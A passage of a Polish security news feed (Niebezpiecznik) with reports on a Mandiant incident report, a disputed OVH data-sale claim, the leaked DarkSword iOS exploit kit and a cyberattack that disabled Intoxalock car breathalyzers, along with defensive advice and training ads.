<p>Zabezpieczasz chmurę i masz MFA? Świetnie. A co z integracjami? Atakujący (np. APT29 czy grupy finansowe) masowo atakują stacje robocze developerów, by wykradać tokeny. Skanują też repozytoria kodu w poszukiwaniu na twardo zaszytych kluczy API. Kradzież tokenów sesyjnych (cookies) oraz refresh tokenów OAuth to również często wykorzystywane techniki. Pozwala to na całkowite ominięcie MFA. Dodatkowo, przestępcy żerują na źle zescope&#8217;owanych uprawnieniach dla aplikacji firm trzecich (np. integracja, która ma tylko czytać logi, dostaje uprawnienia pozwalające na kasowanie bucketów).</p>
<h3>Ten kolega jest też kolegą Kima!</h3>
<p>Trend, o którym <a href="https://niebezpiecznik.pl/post/jak-atakowane-sa-polskie-firmy-posluchajcie-historii-tomasza/" target="_blank">pisaliśmy już wielokrotnie na Niebezpieczniku</a>, wciąż rośnie. Północnokoreańscy &#8220;specjaliści IT&#8221; masowo zatrudniają się w zachodnich firmach pod fałszywymi tożsamościami. W 2025 roku stanowili oni aż 6% wszystkich incydentów wewnętrznych. Co ciekawe, ich mediana czasu przebywania w sieci wynosiła aż 122 dni. Główny cel to pobieranie zachodniej pensji i transferowanie jej reżimowi, ale Mandiant odnotował też przypadki przekupywania innych pracowników (lub podwykonawców), aby ci udostępnili im swoje korporacyjne poświadczenia, co prowadziło do kradzieży danych i prób wymuszeń.</p>
<h3>Co robić, jak żyć w 2026?</h3>
<p>Raport Mandianta mówi jasno: koncepcja obrony oparta wyłącznie na blokowaniu to przeszłość. Należy przejść na model &#8220;Active Resilience&#8221;. Czyli?</p>
<ul>
<li>Chroń Tier-0 i hypervisory. vCenter i serwery backupu nie mogą być wpięte do tego samego Active Directory, co reszta firmy. Złamanie jednego admina domenowego nie może oznaczać padnięcia środowiska wirtualnego i backupów. </li>
<li>MFA na wszystko i ograniczenie OAuth. Nie pozwalaj userom na dowolne klikanie &#8220;Zezwól&#8221; dla aplikacji firm trzecich w Google Workspace czy MS365. Zabezpieczaj logowania adminów <a href="https://www.youtube.com/watch?v=Zr0PffkN09w" target="_blank">kluczami FIDO2</a>.</li>
<li>No i loguj to, czego EDR nie widzi, zbieraj i analizuj logi z vCenter, firewalli i switchy. Szukaj w nich tworzenia nowych ról, snapshotów czy dziwnych logowań SSH. Jak to robić, możesz dowiedzieć się z naszego ostatniego webinara &#8220;<a href="https://sklep.niebezpiecznik.pl/opis/36" target="_blank">SOC w Praktyce</a>&#8220;.</li>
<li>Reaguj natychmiast na &#8220;błahe&#8221; alerty. Jeśli antywirus ubije skrypt z przeglądarki (np. malware &#8220;Kliknij tu, aby naprawić błąd wtyczki&#8221;), nie zamykaj zgłoszenia &#8212; sprawdź dokładnie, czy ułamek sekundy wcześniej nie poszło połączenie zwrotne (reverse shell).</li>
</ul>
<p>A jeśli jesteś administratorem, który dba o bezpieczeństwo firmowej sieci, wpadnij na nasze szkolenie pt. &#8220;<a href="https://niebezpiecznik.pl/net" target="_blank">Bezpieczeństwo Sieci Komputerowych (testy penetracyjne)</a>&#8221; &#8212; przez <strong>3 dni</strong> w specjalnym labie uczymy jak przejmowane są sieci i jak wytropić atakującego. Minimum teorii, maksimum praktyki. Szkolenie kończy się, kiedy masz uprawnienia administratora na każdej maszynie <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f643.png" alt="🙃" class="wp-smiley" style="height: 1em; max-height: 1em;" /> A po drodze uczysz się technik, z których korzystają atakujący, co pozwoli Ci szybciej ich namierzyć w swojej infrastrukturze. Poniżej najbliższe terminy tego szkolenia:</p>
<div><p><b style="color:#f00">Kraków</b>: <strong>13-15 maja 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 4 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 10 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20gfc">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 1 maja)<br>
                        4444 PLN netto (od 2 maja)
                        </ul></div><div><p><b style="color:#f00">Wrocław</b>: <strong>17-19 czerwca 2026</strong>r. — zostało <strong>6 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 18 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20gog">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 8 maja)<br>
                        4444 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00">Warszawa</b>: <strong>01-03 lipca 2026</strong>r. — zostało <strong>7 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 26 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20fty">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 8 maja)<br>
                        4444 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>26-28 sierpnia 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 30 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20g0n">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 15 maja)<br>
                        4444 PLN netto (od 16 maja)
                        </ul></div>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/to-nie-ai-jest-najwiekszym-zagrozeniem-czyli-raport-opisujacy-incydenty-z-2025-roku/#comments" rel="replies" thr:count="1" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/to-nie-ai-jest-najwiekszym-zagrozeniem-czyli-raport-opisujacy-incydenty-z-2025-roku/feed/atom/" rel="replies" thr:count="1" type="application/atom+xml"/>
			<thr:total>1</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Twierdzi, że wykradł dane klientów OVH. Szef OVH zaprzecza]]></title>
		<link href="https://niebezpiecznik.pl/post/ovh-hack-leak/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26941</id>
		<updated>2026-03-24T15:24:23Z</updated>
		<published>2026-03-24T15:24:23Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="OVH"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/ovh-hack-leak/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Podsyłacie nam informacje o tym, że na jednym z cyberprzestępczych kanałów na Telegramie pojawiło się ogłoszenie sprzedaży bazy danych OVH, która miała zostać rzekomo wykradziona z &#8220;OVH parent&#8217;s account&#8221; (cokolwiek przez to rozumie autor). W pozyskanych danych ma rzekomo być: 1.6 milionów rekordów dotyczących "świeżych klientów" OVH 5.9 milionów informacji dot. hostowanych stron Zwracamy jednak [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/ovh-hack-leak/"><![CDATA[<p>Podsyłacie nam informacje o tym, że na jednym z cyberprzestępczych kanałów na Telegramie pojawiło się ogłoszenie sprzedaży bazy danych OVH, która miała zostać rzekomo wykradziona z &#8220;OVH parent&#8217;s account&#8221; (cokolwiek przez to rozumie autor). W pozyskanych danych ma rzekomo być:<span id="more-26941"></span></p>
<p><code>1.6 milionów rekordów dotyczących "świeżych klientów" OVH<br />
5.9 milionów informacji dot. hostowanych stron</code></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked-600x533.jpg" alt="" width="600" height="533" class="aligncenter size-large wp-image-26946" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked-600x533.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked-281x250.jpg 281w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked-768x682.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked.jpg 1398w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Zwracamy jednak uwagę, że Octave Klaba, właściciel OVH <a href="https://x.com/olesovhcom/status/2036316608486875292" target="_blank">zdementował</a> że podane przez sprzedawcę przykładowe dane należą do klienta OVH.</p>
<p>A zatem, bez paniki. Ogłoszenie, jak wiele <a href="https://niebezpiecznik.pl/post/wyciek-danych-klientow-empiku/" target="_blank">innych</a>, może być próbą oszustwa (wyłudzenia pieniędzy od chętnego kupca). </p>
<p>&#8230;ale może to też dobry pomysł, aby &#8212; jeśli jesteście klientami nie tylko OVH &#8212; sprawdzić, czy przypadkiem hasła i inne dane logowania do Waszych hostingów nie są zbieżne danymi logowania do innych miejsc? Albo czy na hostingu nie znajduje się więcej niż powinno. Tak na przyszłość&#8230;</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/ovh-hack-leak/#comments" rel="replies" thr:count="0" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/ovh-hack-leak/feed/atom/" rel="replies" thr:count="0" type="application/atom+xml"/>
			<thr:total>0</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Od dziś każdy może prosto zhackować niezaktualizowanego iPhona i iPada]]></title>
		<link href="https://niebezpiecznik.pl/post/darksword-iphone-ios-exploit/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26934</id>
		<updated>2026-03-24T14:13:55Z</updated>
		<published>2026-03-24T14:13:55Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="DarkSword"/><category scheme="https://niebezpiecznik.pl" term="exploit"/><category scheme="https://niebezpiecznik.pl" term="iOS"/><category scheme="https://niebezpiecznik.pl" term="iPhone"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/darksword-iphone-ios-exploit/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>W ubiegłym tygodniu badacze cyberbezpieczeństwa ujawnili sporych rozmiarów kampanię wymierzoną w użytkowników niezaktualizowanych urządzeń Apple. Ataki realizowano za pomocą narzędzia DarkSword, które dotychczas było w rękach zaawansowanych grup przestępczych. Ale właśnie wyciekło do sieci i każdy może je pobrać z GitHuba. Skopiuj, wklej, atakuj DarkSword to zestaw exploitów na iOS, który jest dość prosty w [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/darksword-iphone-ios-exploit/"><![CDATA[<p>W ubiegłym tygodniu badacze cyberbezpieczeństwa ujawnili sporych rozmiarów kampanię wymierzoną w użytkowników niezaktualizowanych urządzeń Apple. Ataki realizowano za pomocą narzędzia DarkSword, które dotychczas było w rękach zaawansowanych grup przestępczych. Ale właśnie wyciekło do sieci i każdy może je pobrać z GitHuba.<span id="more-26934"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-scaled.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-600x353.jpg" alt="" width="600" height="353" class="aligncenter size-large wp-image-26936" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-600x353.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-350x206.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-768x452.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-1536x905.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-2048x1206.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Skopiuj, wklej, atakuj</h3>
<p>DarkSword to zestaw exploitów na iOS, który jest dość prosty w użyciu (opublikowane pliki to w zasadzie tylko HTML i JavaScript). Oznacza to, że prawie każdy może je skopiować, wrzucić na swój serwer i w kilka minut rozpocząć ataki na użytkowników iPhonów i iPadów. Nie jest tu wymagana żadna zaawansowana wiedza o strukturze systemu iOS. </p>
<h3>Rosyjskie służby i ukraińskie serwery</h3>
<p>DarkSword to nie jest amatorka. Według analityków <a href="https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain" target="_blank">Google</a> oraz <a href="https://www.lookout.com/blog/darksword" target="_blank">Lookout</a>, narzędzie to było wcześniej wykorzystywane przez rosyjskich hakerów rządowych (UNC6353) do inwigilowania celów w Ukrainie. Co ciekawe, w kodzie źródłowym, który trafił do sieci, są fragmenty odpowiedzialne za przesyłanie skradzionych danych do popularnego ukraińskiego sklepu odzieżowego. Najprawdopodobniej atakujący przejęli wcześniej tę stronę, aby używać jej jako tzw. serwera C2 (Command and Control). </p>
<p>Warto dodać, że to już kolejny taki incydent w tym miesiącu. Niedawno głośno było o exploitpacku Coruna, stworzonym przez firmę L3Harris dla amerykańskiego rządu.</p>
<h3>Co groźnego potrafi DarkSword?</h3>
<p>DarkSword po udanym ataku po cichu wykrada z urządzenia: </p>
<ul>
kontakty,<br />
wiadomości,<br />
historię połączeń<br />
zawartość systemowego pęku kluczy (iOS Keychain), w którym przechowywane są m.in.<strong> hasła do Wi-Fi i innych usług</strong>. </ul>
<p>To nie jest narzędzie działające jak Pegasus (długotrwała inwigilacja). Raczej toolkit do szybkiego wejścia, kradzieży i wyjścia. Co ciekawe ma też funkcje kradzieży kryptowalut.</p>
<h3>Kogo dotyczą te ataki?</h3>
<p>DarkSword atakuje systemy <strong>iOS w wersji 18</strong> bez włączonego mechanizmu Lockdown. Według danych Apple, około 25% użytkowników wciąż korzysta z iOS 18 lub starszych wersji systemu. Oznacza to setki milionów urządzeń, które są &#8220;na tacy&#8221; dla każdego, kto pobierze kod z GitHuba. </p>
<p>Na szczęście, ataki DarkSword nie powiodą się, jeśli urzędzenie jest zaktualizowane do najnowszego, dostępnego od października 2025 systemu iOS 26. Na marginesie: Apple nie wydało wersji iOS 19 ponieważ zmieniło numerację tak aby odpowiadała ona bieżącej dacie. Dla naprawdę starych urządzeń, które nie są wspierane przez iOS 26, Apple wydało ratunkową łatkę bezpieczeństwa 11 marca.</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-scaled.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-600x345.jpg" alt="" width="600" height="345" class="aligncenter size-large wp-image-26937" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-600x345.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-350x201.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-768x441.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-1536x883.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-2048x1177.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Mam iPhone&#8217;a &#8212; co robić, jak żyć?</h3>
<p>Aby nie paść ofiarą DarkSword, zastosuj się do poniższych rad:</p>
<ul>
<li>Zaktualizuj system do najnowszej wersji iOS 26. Jeśli Twoje urządzenie nie wspiera iOS 26, zainstaluj łatkę bezpieczeństwa dla starszego systemu, która została wydane 11 marca lub włącz tryb Lockdown.</li>
<li>Włącz Tryb Blokady (Lockdown Mode). To specjalna funkcja w urządzeniach Apple, która drastycznie ogranicza wektory ataków, blokując m.in. podejrzane skrypty na stronach www i w komunikatorach. </li>
</ul>
<p>Jeśli chcesz wiedzieć więcej o tym, jak zabezpieczyć swojego smartfona (nie tylko iPhona) przed atakami, które mogą zagrażać Twoim pieniądzom, danym lub prywatności, to wpadnij na nasz wykład pt. &#8220;Jak nie dać się zhackować?&#8221;, z którym w najbliższych tygodniach odwiedzimy te miasta: </p>
<ul>
<li><a href="https://nbzp.cz/jnsz-kra2604" target="_blank">Krakowie, 9 kwietnia &#8212; zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-waw2604" target="_blank">Warszawie, 16 kwietnia &#8212; zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-wro2606" target="_blank">Wrocławiu, 11 czerwca &#8212; zapisz się tutaj!</a></li>
</ul>
<p>Ten wykład, to wszystko co dziś każdy powinien wiedzieć na temat cyberbezpieczeństwa. Kropka. Całość wiedzy podajemy w przystępny i zrozumiały dla każdego sposób, więc zapraszamy wszystkich, także osoby całkowicie nietechniczne. Można z rodzicami, można z dziadkami, można z dziećmi (rekomendujemy 15+). Będą widowiskowe pokazy ataków na żywo. Będzie dużo praktycznych, ale prostych i darmowych do wdrożenia rad. Gwarantujemy, że z wykładu wyjdziesz bezpieczniejszy. Ten wykład dopieszczaliśmy przez 6 lat i widziało go już ponad 100 tys. osób (średnia ocena to 9,48/10). <a href="https://niebezpiecznik.pl/wyklad" target="_blank">Kliknij tutaj aby zobaczyć pełen opis i film z poprzedniej edycji oraz żeby zarezerwować miejsce dla siebie</a>.</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/darksword-iphone-ios-exploit/#comments" rel="replies" thr:count="26" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/darksword-iphone-ios-exploit/feed/atom/" rel="replies" thr:count="26" type="application/atom+xml"/>
			<thr:total>26</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Cyberatak unieruchomił niektóre samochody w USA]]></title>
		<link href="https://niebezpiecznik.pl/post/cyberatak-unieruchomil-niektore-samochody-w-usa/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26927</id>
		<updated>2026-03-23T14:55:06Z</updated>
		<published>2026-03-23T12:44:33Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="alkohol"/><category scheme="https://niebezpiecznik.pl" term="atak"/><category scheme="https://niebezpiecznik.pl" term="blokada"/><category scheme="https://niebezpiecznik.pl" term="DoS"/><category scheme="https://niebezpiecznik.pl" term="paraliż"/><category scheme="https://niebezpiecznik.pl" term="samochody"/><category scheme="https://niebezpiecznik.pl" term="USA"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/cyberatak-unieruchomil-niektore-samochody-w-usa/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>14 marca Intoxalock, amerykańska firma dostarczająca samochodowe blokady alkoholowe padła ofiarą cyberataku. W efekcie tysiące kierowców w aż 46 stanach USA straciło możliwość uruchomienia swoich pojazdów. Blokady alkoholowe podłączone do internetu, cóż mogło pójść nie tak&#8230; Blokady alkoholowe to urządzenia montowane w pojazdach, najczęściej na mocy nakazu sądowego dla osób skazanych za jazdę pod wpływem [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/cyberatak-unieruchomil-niektore-samochody-w-usa/"><![CDATA[<p>14 marca Intoxalock, amerykańska firma dostarczająca samochodowe blokady alkoholowe padła ofiarą cyberataku. W efekcie tysiące kierowców w aż 46 stanach USA straciło możliwość uruchomienia swoich pojazdów.<span id="more-26927"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-scaled.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-600x342.jpg" alt="" width="600" height="342" class="aligncenter size-large wp-image-26928" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-600x342.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-350x200.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-768x438.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-1536x876.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-2048x1168.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Blokady alkoholowe podłączone do internetu, cóż mogło pójść nie tak&#8230;</h3>
<p>Blokady alkoholowe to urządzenia montowane w pojazdach, najczęściej na mocy nakazu sądowego dla osób skazanych za jazdę pod wpływem alkoholu. Mechanizm jest prosty &#8212; przed uruchomieniem silnika kierowca musi dmuchnąć w ustnik. Jeśli urządzenie wykryje alkohol, zapłon zostaje zablokowany. Problem w tym, że dzisiejsze alkomaty są na stałe podłączone do internetu bo &#8212; jak <a href="https://wgme.com/news/local/cyberattack-leaves-maine-drivers-with-breathalyzer-test-systems-unable-to-start-vehicles-oui-intoxalock" target="_blank">tłumaczy</a> przedstawiciel producenta &#8212; wymagają zdalnej kalibracji co jakiś czas. Widzicie już pewnie co tu poszło nie tak&#8230; Gdy po ataku infrastruktura producenta padła, urządzenia które wymagały kalibracji przeszły w &#8220;tryb awaryjny&#8221; i prewencyjnie odcięły zapłon, niezależnie od tego, czy kierowca był trzeźwy, czy nie. </p>
<p>Ten incydent to doskonały przykład na to, jak niebezpieczne bywa bezkrytyczne poleganie na urządzeniach, które do podstawowego działania wymagają nieprzerwanego połączenia z chmurą producenta. To nie pierwszy raz, kiedy błędy lub ataki na infrastrukturę zewnętrzną uziemiają &#8220;inteligentne&#8221; sprzęty. Kiedyś pisaliśmy o podobnych przypadkach z <a href="https://niebezpiecznik.pl/post/ransomware-zaatakowalo-hotel-ale-wcale-nie-uwiezilo-gosci-w-hotelowych-pokojach/" target="_blank">inteligentnymi zamkami do drzwi</a>.</p>
<p>W przypadku alkomatów samochodowych sprawa jest jednak znacznie poważniejsza ze względów prawnych. Zgodnie z relacjami kierowców w serwisie Reddit, osoby posiadające sądowy nakaz korzystania z urządzenia nie mogą go po prostu zdemontować, ani legalnie prowadzić innego auta. W efekcie cyberatak uwięził ich w domach i uniemożliwił np. dojazd do pracy. A wiadomo jak to jest w USA, wszędzie trzeba samochodem bo chodników nie ma ;P</p>
<div class="info">Nawet jeśli nie masz alkomatu w samochodzie, to zapewne na co dzień korzystasz z wielu innych rzeczy podłączonych do internetu. Czy wiesz na jakie zagrożenia te rzeczy mogą Cię narazić? Czy potrafisz się przed nimi poprawnie zabezpieczyć? Posłuchaj rad, które podniosą Twoje bezpieczeństwo, nie tylko w kontekście ataków związanych z &#8220;internetem rzeczy&#8221;. Już za chwilę w Warszawie i Krakowie odbędzie się nasz wykład pt. &#8220;<a href="https://niebezpiecznik.pl/wyklad" target="_blank">Jak Nie Dać Się Zhackować?</a>&#8220;, podczas którego przystępnym i <strong>zrozumiałym dla każdego językiem</strong> przekażemy wiedzę, którą dziś każdy korzystający z internetu musi posiadać. Będzie o tym jak zabezpieczyć się przed aktualnymi atakami, jak ochronić swoje pieniądze, dane i prywatność. <a href="https://niebezpiecznik.pl/wyklad" target="_blank">Kliknij tu aby sprawdzić terminy, pełen opis i zapisz się na wykład już dziś</a>!</div>
<p>Na razie nie wiadomo, kto dokładnie stoi za atakiem i czy był to ransomware. W Polsce, choć były takie pomysły, na razie nie mamy scentralizowanego i uzależnionego od połączeń internetowych systemu blokad alkoholowych. Ale ten trend podłączania wszystkiego do sieci z roku na rok przybiera na sile. Zresztą, paraliż nie musi się rozpocząć od ataku na producenta blokady alkoholowej. Przecież same samochody to dziś komputery, które są na stałe podłączone do internetu i przez ten internet &#8212; na skutek działania samego producenta lub atakujących &#8212; mogą zostać unieruchomione. Takie ataki miały już miejsce w przeszłości.</p>
<p>Podsumowując &#8212; jeśli pijesz, nie jedź. A jeśli nie pijesz&#8230; upewnij się, że Twój samochód do startu nie wymaga połaczenia z internetem. W dobie ataków może się okazać, że o wiele szybciej jest wytrzeźwieć, niż doczekać się przywrócenia usług po udanym cyberataku.</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/cyberatak-unieruchomil-niektore-samochody-w-usa/#comments" rel="replies" thr:count="13" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/cyberatak-unieruchomil-niektore-samochody-w-usa/feed/atom/" rel="replies" thr:count="13" type="application/atom+xml"/>
			<thr:total>13</thr:total>
			</entry>
	</feed>